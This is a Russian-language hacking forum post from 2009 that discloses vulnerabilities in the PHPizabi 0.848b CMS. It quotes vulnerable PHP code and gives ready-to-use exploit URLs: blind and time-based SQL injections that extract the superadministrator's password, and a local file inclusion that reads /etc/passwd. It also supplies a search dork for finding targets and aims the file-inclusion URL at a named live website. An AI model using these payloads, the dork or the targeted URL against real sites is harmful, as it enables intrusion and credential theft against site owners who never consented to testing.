ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Уязвимости PHPizabi 0.848b (latest version)
  #1  
Старый 04.06.2009, 09:54
Аватар для Iceangel_
Iceangel_
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206

Репутация: 1861


По умолчанию Уязвимости PHPizabi 0.848b (latest version)

Уязвимости PHPizabi 0.848b(latest version)
(возможно уязвимы и более ранние версии)


download: http://www.phpizabi.net/?L=downloads.downloadcore&X=dist.core.download&lat est=1

dork: "Powered by PHPizabi v0 848b C1 HFP1"



1) [Blind SQL-injection] (требования: magic_quotes=off)

/modules/users/profile.php
уязвимый код:
PHP код:
if (isset($_GET["id"])) {
    
        
// GET ID MODS (USERNAMES IN ID) ////////////////////////////////////////////////////////////
        /*
            The following couple lines will handle a USERNAME posted
            as a user ID in the URL, if the "ID" value is not numeric,
            it must be one. Let's try to find a user entry for that username
        */
        
if (!is_numeric($_GET["id"])) { 
            
$fetchUserName myF(myQ("SELECT `id` FROM `[x]users` WHERE LCASE(`username`)='".strtolower($_GET["id"])."'"));
            if (
is_array($fetchUserName)) $_GET["id"] = $fetchUserName["id"];
        } 
эксплуатирование:
Код:
index.php?L=users.profile&id=1'+and+ascii(substring((select+concat_ws(0x3a,username,password)+from+phpizabi_users+where+is_superadministrator=1+and+active=1+limit+0,1),1,1))>50--+

/modules/blog/edit.php
уязвимый код:
PHP код:
$row myF(myQ("SELECT * FROM `[x]blogs` WHERE `id`='{$_GET["id"]}'")); 
эксплуатирование:
Код:
http://localhost/hack/izabi/?L=blogs.edit&id=1'+or+if(ascii(substring((select+concat_ws(0x3a,username,password)+from+phpizabi_users+where+is_superadministrator=1+and+active=1+limit+0,1),1,1))>1,BENCHMARK(1000000,md5(current_date)),2)--+
2)[LFI] (требования: register_globals=on)

/install/index.php
уязвимый код:
PHP код:
if (isset($GLOBALS["processors"])) foreach ($GLOBALS["processors"] as $proc) {
        include(
"includes/{$proc}");
    } 
эксплуатирование:

можно заинклудить хоть массив файлов =)
Код:
install/?processors[]=../../../../../../../../../etc/passwd
примечание:
CMS не требует, и даже никак не намекает, что директорию install лучше удалить
Код:
http://arlance.net/install/?processors[]=../../../../../../../../../etc/passwd

Последний раз редактировалось Iceangel_; 04.06.2009 в 10:21..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Секретные Коды _-[A.M.D]HiM@S-_ Сотовый фрикинг 98 09.06.2010 16:01
Уязвимости AmpJuke 0.7.7(latest version) Iceangel_ Сценарии/CMF/СMS 0 26.04.2009 13:54
[99.7%] решение проблемы с icq AlexV ICQ 88 25.01.2009 13:31
Уязвимости в форуме Powered by vBulletin Version 3.x.x TORn@Do Форумы 6 15.02.2005 14:50
Вопрос про уязвимости в Vbulletin version 2.2.7 mynhauzen Форумы 3 04.08.2004 12:14



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ